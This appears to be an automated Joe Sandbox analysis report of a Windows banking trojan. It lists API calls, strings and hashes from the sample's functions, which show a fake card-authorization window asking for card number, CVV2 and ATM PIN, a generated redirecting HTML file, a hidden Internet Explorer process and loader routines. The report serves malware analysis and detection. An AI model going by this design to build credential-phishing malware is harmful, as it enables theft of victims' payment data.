                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D2B
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405D95
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DA8
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DCA
                            • FindWindowA.USER32(IEFrame,?), ref: 00405DED
                            • Sleep.KERNEL32(000003E8,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405DFD
                            • Sleep.KERNEL32(0000F000,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405E20
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405E38
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00405E85
                            • DeleteFileA.KERNEL32(?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EA4
                            • lstrlenA.KERNEL32(<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EAE
                            • strncmp.CRTDLL(00000000,<HTML><!--,00000000,<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000), ref: 00405EBA
                            • lstrlenA.KERNEL32(<HTML><!--,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405ECB
                            • LocalFree.KERNEL32(00000000,?,?,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000), ref: 00405F0F
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F2B
                            • TerminateProcess.KERNEL32(?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F38
                            • CloseHandle.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F49
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$Filelstrlensprintf$CloseDeleteHandleProcessSleepThreadWindowmemset$CopyCountCreateCurrentDesktopEnvironmentExpandFindFreeIncrementInterlockedLocalOpenPathStringsTempTerminateTextTicksrandstrncmp
                            • String ID: %s%u - Microsoft Internet Explorer$<HTML><!--$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 4103625910-1993706416
                            • Opcode ID: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction ID: dc295d18008c6f961fbff17ccdc6ec9b88b81df80f56d8f6893aa762a7281c5f
                            • Opcode Fuzzy Hash: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction Fuzzy Hash: 7B81A8B1E041186ADB20B665CC4ABDEB7BD9F40304F1444F7B608F61D1E6B99F848F59
                            Function 00406753 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                            • GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                              • Part of subcall function 004013CC: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004013EF
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?), ref: 004054F1
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?), ref: 00405505
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?), ref: 00405513
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                              • Part of subcall function 004054D7: LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                              • Part of subcall function 004054D7: memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                              • Part of subcall function 004054D7: CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                              • Part of subcall function 004054D7: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                              • Part of subcall function 004054D7: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                              • Part of subcall function 00401348: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00401375
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Create$FileThread$AllocCloseCodeExitHandleLocalObjectOpenSingleSizeWaitmemcpy
                            • String ID: Software\Microsoft
                            • API String ID: 3232930010-89712428
                            • Opcode ID: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction ID: db3b40ff5e41acc5bdae17a6e42d24a18e18c948de20eb22515eb7809feee29e
                            • Opcode Fuzzy Hash: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction Fuzzy Hash: C3219972E002097BEB10AE998D42FDEBAA8DB04714F644077FB00B61E1E6B55A108B99
                            Function 00406075 Relevance: 124.7, APIs: 52, Strings: 19, Instructions: 488windowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00405FFA: GetWindow.USER32(?,00000005), ref: 00406019
                              • Part of subcall function 00405FFA: GetClassNameA.USER32(00000000,?,00000FFF), ref: 0040603B
                            • ShowWindow.USER32(00000000), ref: 004060B9
                            • GetWindowRect.USER32(00000000,?), ref: 004060C9
                            • CreateWindowExA.USER32(00000200,QueenKarton,0042CBF0,50800000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004060FF
                            • CreateWindowExA.USER32(00000000,STATIC, Authorization Failed.,50800000,00000014,00000014,?,0000003C,00000000,00000000,00000000,00000200), ref: 00406135
                            • CreateWindowExA.USER32(00000000,STATIC,0042CBF0,50800009,00000014,00000051,?,0000012C,00000000,00000000,00000000,STATIC), ref: 00406179
                            • CreateFontA.GDI32(00000014,00000008,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 004061A2
                            • SendMessageA.USER32(00000030,00000000,00000001,00000000), ref: 004061B4
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,00000014,00000014,00000064,00000064,00000000,00000000,STATIC,0042CBF0), ref: 004061E2
                            • SendMessageA.USER32(00000000,00000143,00000000,MasterCard), ref: 004061FF
                            • SendMessageA.USER32(00000143,00000000,Visa,00000000), ref: 00406216
                            • SendMessageA.USER32(0000014E,00000001,00000000,00000143), ref: 00406233
                            • SendMessageA.USER32(0000014E,00000000,00000000,00000143), ref: 00406249
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,0000007A,00000014,00000032,0000012C,00000000,00000000,0000014E,00000000), ref: 0040627A
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX), ref: 004062B9
                            • sprintf.CRTDLL(?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX,0042CBF0), ref: 004062DF
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 004062F5
                            • sprintf.CRTDLL(?,20%.2u,-00000002,00000143,00000000,?,?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C), ref: 0040630B
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 00406324
                            • CreateWindowExA.USER32(00000000,STATIC,Card && expiration date,50000000,00000114,0000006E,00000081,00000010,00000000,00000000,00000143,00000000), ref: 0040636B
                            • CreateWindowExA.USER32(00000000,STATIC,Your card number,50000000,000000C3,00000087,00000067,00000010,00000000,00000000,00000000,STATIC), ref: 004063AA
                            • CreateWindowExA.USER32(00000000,STATIC,3-digit validation code on back of card (cvv2),50000000,00000064,000000A0,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 004063E3
                            • CreateWindowExA.USER32(00000000,STATIC,ATM PIN-Code,50000000,000000A0,000000B9,00000056,00000010,00000000,00000000,00000000,STATIC), ref: 0040641C
                            • CreateWindowExA.USER32(00000000,STATIC,Unable to authorize. ATM PIN-Code is required to complete the transaction.,50000000,0000001E,000000E6,000001E4,00000010,00000000,00000000,00000000,STATIC), ref: 00406455
                            • CreateWindowExA.USER32(00000000,STATIC,Please make corrections and try again.,50000000,0000001E,000000FF,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 0040648E
                            • CreateWindowExA.USER32(00000200,EDIT,00429180,50800000,00000014,0000002D,00000082,00000018,00000000,00000000,00000000,STATIC), ref: 004064C7
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,00000046,00000028,00000018,00000000,00000000,00000200,EDIT), ref: 00406503
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,0000005F,00000064,00000018,00000000,00000000,00000200,EDIT), ref: 00406539
                            • CreateWindowExA.USER32(00000000,BUTTON,Click Once To Continue,50800000,0000001E,00000140,0000009B,00000017,00000000,00000000,00000200,EDIT), ref: 00406572
                            • CreateFontA.GDI32(00000010,00000006,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 0040659B
                            • SendMessageA.USER32(00000030,00000000,00000001,00000010), ref: 004065B3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065C3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065D3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065E3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065F9
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406609
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406619
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406632
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406642
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406652
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406662
                            • GetWindowLongA.USER32(000000FC,00000030), ref: 0040666F
                            • SetWindowLongA.USER32(000000FC,004077E4,00000000), ref: 00406686
                            • GetWindowLongA.USER32(000000FC,00000001), ref: 00406699
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066B0
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066BD
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066D4
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066E1
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066F8
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406705
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 0040671C
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406732
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 00406749
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$CreateMessageSend$Long$Fontsprintf$ClassNameRectShow
                            • String ID: Authorization Failed.$%.2u$20%.2u$3-digit validation code on back of card (cvv2)$ATM PIN-Code$BUTTON$COMBOBOX$Card && expiration date$Click Once To Continue$DocObject$EDIT$Explorer$MasterCard$Please make corrections and try again.$QueenKarton$STATIC$Unable to authorize. ATM PIN-Code is required to complete the transaction.$Visa$Your card number
                            • API String ID: 1504929638-2953596215
                            • Opcode ID: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction ID: 07d4a47d2009414dc6278682baa0b56b1decc7bc7d2f3e077783c243e1dcc7f7
                            • Opcode Fuzzy Hash: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction Fuzzy Hash: 43F16F31BC43157AFA212B61ED43FA93A66AF14F44F60413AB700BD0F1DAF92911AB5D
                            Function 0040570C Relevance: 122.9, APIs: 56, Strings: 14, Instructions: 371stringfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 310 40570c-405743 call 4079e4 GetTempPathA 313 405746-40574b 310->313 313->313 314 40574d-405796 call 4015ea strcat sprintf rand 313->314 317 405798-4057a9 strcat 314->317 318 4057ac-4057bc rand 314->318 317->318 319 4057e7-4057f7 rand 318->319 320 4057be-4057e4 rand sprintf 318->320 321 4057f9-40580a strcat 319->321 322 40580d-405837 strcat rand 319->322 320->319 321->322 323 405839-40584a strcat 322->323 324 40584d-40585d rand 322->324 323->324 325 405888-4058c1 sprintf rand 324->325 326 40585f-405885 rand sprintf 324->326 327 4058c3-4058d4 strcat 325->327 328 4058d7-4058fb strcat rand 325->328 326->325 327->328 329 405911-40593b strcat rand 328->329 330 4058fd-40590e strcat 328->330 331 405966-40598a strcat rand 329->331 332 40593d-405963 rand sprintf 329->332 330->329 333 4059a0-4059d0 strcat rand 331->333 334 40598c-40599d strcat 331->334 332->331 335 4059d2-4059e3 strcat 333->335 336 4059e6-405a0a strcat rand 333->336 334->333 335->336 337 405a20-405a5a sprintf rand 336->337 338 405a0c-405a1d strcat 336->338 339 405a70-405a9a strcat rand 337->339 340 405a5c-405a6d strcat 337->340 338->337 341 405ab0-405af1 rand sprintf rand 339->341 342 405a9c-405aad strcat 339->342 340->339 343 405af3-405b04 strcat 341->343 344 405b07-405b37 strcat rand 341->344 342->341 343->344 345 405b39-405b4a strcat 344->345 346 405b4d-405b5d rand 344->346 345->346 347 405b88-405c08 strcat CreateFileA lstrlenA WriteFile CloseHandle 346->347 348 405b5f-405b85 rand sprintf 346->348 348->347
                            APIs
                            • GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                            • strcat.CRTDLL(?,.htm), ref: 00405764
                            • sprintf.CRTDLL(?,<html>), ref: 00405778
                            • rand.CRTDLL ref: 00405786
                            • strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                            • rand.CRTDLL ref: 004057AC
                            • rand.CRTDLL ref: 004057BE
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                            • rand.CRTDLL ref: 004057E7
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405805
                            • strcat.CRTDLL(?,<head>), ref: 00405819
                            • rand.CRTDLL ref: 00405827
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405845
                            • rand.CRTDLL ref: 0040584D
                            • rand.CRTDLL ref: 0040585F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405880
                            • sprintf.CRTDLL(?,%s<title>%s%u</title>,?,MicroSoft-Corp,?), ref: 004058A3
                            • rand.CRTDLL ref: 004058B1
                            • strcat.CRTDLL(?,0042CC6C), ref: 004058CF
                            • strcat.CRTDLL(?,</head>), ref: 004058E3
                            • rand.CRTDLL ref: 004058EB
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405909
                            • strcat.CRTDLL(?,<body>), ref: 0040591D
                            • rand.CRTDLL ref: 0040592B
                            • rand.CRTDLL ref: 0040593D
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 0040595E
                            • strcat.CRTDLL(?,<script>), ref: 00405972
                            • rand.CRTDLL ref: 0040597A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405998
                            • strcat.CRTDLL(?,function x()), ref: 004059AC
                            • rand.CRTDLL ref: 004059C0
                            • strcat.CRTDLL(?,0042CC6C), ref: 004059DE
                            • strcat.CRTDLL(?,0042CA2E), ref: 004059F2
                            • rand.CRTDLL ref: 004059FA
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A18
                            • sprintf.CRTDLL(?,%sself.parent.location="%s";,?,?), ref: 00405A42
                            • rand.CRTDLL ref: 00405A4A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A68
                            • strcat.CRTDLL(?,0042CA14), ref: 00405A7C
                            • rand.CRTDLL ref: 00405A8A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AA8
                            • rand.CRTDLL ref: 00405AB0
                            • sprintf.CRTDLL(?,%ssetTimeout("x()",%u);,?), ref: 00405AD9
                            • rand.CRTDLL ref: 00405AE1
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AFF
                            • strcat.CRTDLL(?,</script>), ref: 00405B13
                            • rand.CRTDLL ref: 00405B27
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405B45
                            • rand.CRTDLL ref: 00405B4D
                            • rand.CRTDLL ref: 00405B5F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405B80
                            • strcat.CRTDLL(?,</body><html>), ref: 00405B94
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BAC
                            • lstrlenA.KERNEL32(?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BCD
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BE9
                            • CloseHandle.KERNEL32(?,?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$sprintf$File$CloseCreateHandlePathTempWritelstrlen
                            • String ID: %s<!-- %u -->$%s<title>%s%u</title>$%sself.parent.location="%s";$%ssetTimeout("x()",%u);$.htm$</body><html>$</head>$</script>$<body>$<head>$<html>$<script>$MicroSoft-Corp$function x()
                            • API String ID: 4291226702-3565490566
                            • Opcode ID: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction ID: 1c5cdfde58a584b0b9fe07ae47c92bc765a9e47636cc13cf9b12a0be20bdf5ec
                            • Opcode Fuzzy Hash: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction Fuzzy Hash: 93B1CAB6F0132416EB14A262DCC6B6D31AA9B85704F6404FFF508731C2E67C6E558AFE
                            Function 00402E06 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 337libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00402822: GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            • GetVersion.KERNEL32 ref: 00402E22
                            • LoadLibraryA.KERNEL32 ref: 00402E91
                            • GetProcAddress.KERNEL32 ref: 00402EC5
                            • IsBadReadPtr.KERNEL32(?,00001000), ref: 00402F75
                            • GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                            • CloseHandle.KERNEL32(?), ref: 00403065
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004030EA
                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040315B
                            • IsBadWritePtr.KERNEL32(00000000,00001000), ref: 004031F1
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Handle$Module$CloseGlobalLibraryLoadMemoryQueryReadStatusVersionVirtualWrite
                            • String ID: kernel32.dll
                            • API String ID: 2089743848-1793498882
                            • Opcode ID: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction ID: cfd5926590b061e949c3a24607155209ead47d6dc4f6dfca132d0ef3b1a5cdf0
                            • Opcode Fuzzy Hash: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction Fuzzy Hash: F6F19070D042B88BEB328F64DD483E9BBB1AB55306F0481EBD588662D2C2B85FC5CF55
                            Function 00405F5B Relevance: 13.6, APIs: 9, Instructions: 64stringthreadmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405F73
                            • lstrlenA.KERNEL32(?,?), ref: 00405F7E
                            • LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                            • lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                            • DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCacheCloseCodeCreateDeleteEntryExitHandleLocalObjectSingleWait
                            • String ID:
                            • API String ID: 794401840-0
                            • Opcode ID: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction ID: 5ee1198a60b0fc2a8532ff5616a25e8349e08cf473eab22e95dc85017e90c3ca
                            • Opcode Fuzzy Hash: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction Fuzzy Hash: B011CA71A082447BD701F6668C42EAFB76DDF85368F144476F600B71C2D678AF0147E9
                            Function 00405613 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                            Download Yara Rule
                            APIs
                            • FindFirstUrlCacheEntryA.WININET(*.*,?,00001F40), ref: 00405654
                            • _stricmp.CRTDLL(?,?), ref: 00405679
                            • FindNextUrlCacheEntryA.WININET(00000000,?,00001F40), ref: 004056C0
                            • _stricmp.CRTDLL(?,?), ref: 004056D6
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmpDownload File
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: CacheEntryFind_stricmp$FirstNext
                            • String ID: *.*
                            • API String ID: 747601842-438819550
                            • Opcode ID: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
